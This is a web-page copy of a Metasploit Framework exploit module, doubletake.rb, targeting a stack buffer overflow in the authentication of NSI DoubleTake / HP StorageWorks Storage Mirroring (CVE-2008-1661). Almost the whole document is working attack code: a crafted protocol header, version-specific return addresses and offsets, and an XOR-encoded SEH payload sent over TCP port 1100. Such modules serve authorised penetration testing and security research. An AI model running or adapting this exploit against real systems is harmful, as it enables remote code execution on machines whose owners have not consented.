Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/misc/doubletake.rb
19847 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Seh

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow',

17
        'Description' => %q{

18
          This module exploits a stack buffer overflow in the authentication mechanism of

19
          NSI Doubletake which is also rebranded as HP Storage Works. This vulnerability

20
          was found by Titon of Bastard Labs.

21
        },

22
        'Author' => [ 'ri0t <ri0t[at]ri0tnet.net>' ],

23
        'References' => [

24
          ['CVE', '2008-1661' ],

25
          ['OSVDB', '45924' ],

26
        ],

27
        'Privileged' => false,

28
        'DefaultOptions' => {

29
          'EXITFUNC' => 'process',

30
        },

31
        'Payload' => {

32
          'Space' => 500,

33
          'BadChars' => "\x00",

34
        },

35
        'Platform' => 'win',

36


37
        'Targets' => [

38
          ['doubletake 4.5.0', { 'Ret' => 0x006f5fa7, 'Offset' => 5544 } ],

39
          ['doubletake 4.4.2', { 'Ret' => 0x0074e307, 'Offset' => 944 } ],

40
          ['doubletake 4.5.0.1819', { 'Ret' => 0x006e62dd, 'Offset' => 5544 } ],

41
        ],

42
        'DefaultTarget' => 0,

43
        'DisclosureDate' => '2008-06-04',

44
        'Notes' => {

45
          'Reliability' => UNKNOWN_RELIABILITY,

46
          'Stability' => UNKNOWN_STABILITY,

47
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

48
        }

49
      )

50
    )

51


52
    register_options(

53
      [

54
        Opt::RPORT(1100)

55
      ]

56
    )

57
  end

58


59
  def exploit

60
    connect

61


62
    print_status("Trying target #{target.name}...")

63


64
    header =

65
      "\x00\x02\x00\x01\x27\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +

66
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x36\x00\x00\x00\x00" +

67
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01" +

68
      "\x00\x00\x00\x1e\x00\x00\x00\x01\x00\x01"

69


70
    xor = Rex::Encoding::Xor::Byte

71
    filler = rand_text_english(1) * (target['Offset'])

72
    seh = generate_seh_payload(target.ret)

73
    buffercoded = xor.encode(seh + payload.encoded, [0xf0].pack("C"))

74
    sploit = header + filler + buffercoded[0]

75
    sock.put(sploit)

76


77
    handler

78
    disconnect

79
  end

80
end

81


82